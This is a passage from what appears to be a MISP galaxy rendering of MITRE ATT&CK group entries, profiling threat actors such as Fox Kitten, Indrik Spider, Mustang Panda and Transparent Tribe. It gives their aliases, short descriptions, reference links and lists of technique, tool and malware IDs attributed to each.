uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="BloodHound - S0521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="dsquery - S0105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Two-Factor Authentication Interception - T1111" with estimative-language:likelihood-probability="almost-certain"

Table 4478. Table References
Links
https://attack.mitre.org/groups/G0116
https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf

Fox Kitten - G0117

[Fox Kitten](https://attack.mitre.org/groups/G0117) is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://attack.mitre.org/groups/G0117) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: Dragos PARISITE )(Citation: ClearSky Pay2Kitten December 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Fox Kitten - G0117"

Fox Kitten - G0117 is also known as:

Fox Kitten
UNC757
PIONEER KITTEN
Parisite

View relationships graph

Fox Kitten - G0117 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Ngrok - S0508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Pay2Key - S0556" with estimative-language:likelihood-probability="almost-certain"

Table 4479. Table References
Links
https://attack.mitre.org/groups/G0117
https://www.clearskysec.com/fox-kitten/
https://www.crowdstrike.com/blog/who-is-pioneer-kitten/
https://www.dragos.com/threat/parisite/
https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf
https://us-cert.cisa.gov/ncas/alerts/aa20-259a

Indrik Spider - G0119

[Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that as been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Indrik Spider - G0119"

Indrik Spider - G0119 is also known as:

Indrik Spider
Evil Corp

View relationships graph

Indrik Spider - G0119 has relationships with:

uses: misp-galaxy:mitre-malware="Dridex - S0384" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Server - T1584.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BitPaymer - S0570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="WastedLocker - S0612" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

Table 4480. Table References
Links
https://attack.mitre.org/groups/G0119
https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/
https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/
https://home.treasury.gov/news/press-releases/sm845

Silent Librarian - G0122

[Silent Librarian](https://attack.mitre.org/groups/G0122) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of [Silent Librarian](https://attack.mitre.org/groups/G0122) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Malwarebytes Silent Librarian October 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Silent Librarian - G0122"

Silent Librarian - G0122 is also known as:

Silent Librarian
TA407
COBALT DICKENS

View relationships graph

Silent Librarian - G0122 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Search Victim-Owned Websites - T1594" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1588.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Link Target - T1608.005" with estimative-language:likelihood-probability="almost-certain"

Table 4481. Table References
Links
https://attack.mitre.org/groups/G0122
https://www.justice.gov/usao-sdny/press-release/file/1045781/download
https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment
https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian
https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities
https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again

Volatile Cedar - G0123

[Volatile Cedar](https://attack.mitre.org/groups/G0123) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://attack.mitre.org/groups/G0123) has been operating since 2012 and is motivated by political and ideological interests.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Volatile Cedar - G0123"

Volatile Cedar - G0123 is also known as:

Volatile Cedar
Lebanese Cedar

View relationships graph

Volatile Cedar - G0123 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Explosive - S0569" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Caterpillar WebShell - S0572" with estimative-language:likelihood-probability="almost-certain"

Table 4482. Table References
Links
https://attack.mitre.org/groups/G0123
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf
https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

Mustang Panda - G0129

[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Germany, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Mustang Panda - G0129"

Mustang Panda - G0129 is also known as:

Mustang Panda
TA416
RedDelta
BRONZE PRESIDENT

View relationships graph

Mustang Panda - G0129 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"

Table 4483. Table References
Links
https://attack.mitre.org/groups/G0129
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/
https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
https://www.secureworks.com/research/bronze-president-targets-ngos
https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader
https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf

Nomadic Octopus - G0133

[Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyberespionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Nomadic Octopus - G0133"

Nomadic Octopus - G0133 is also known as:

Nomadic Octopus
DustSquad

View relationships graph

Nomadic Octopus - G0133 has relationships with:

uses: misp-galaxy:mitre-malware="Octopus - S0340" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 4484. Table References
Links
https://attack.mitre.org/groups/G0133
https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html
https://securelist.com/octopus-infested-seas-of-central-asia/88200/
https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf
https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia

Transparent Tribe - G0134

[Transparent Tribe](https://attack.mitre.org/groups/G0134) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Transparent Tribe - G0134"

Transparent Tribe - G0134 is also known as:

Transparent Tribe
COPPER FIELDSTONE
APT36
Mythic Leopard
ProjectM

View relationships graph

Transparent Tribe - G0134 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Crimson - S0115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="njRAT - S0385" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1584.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
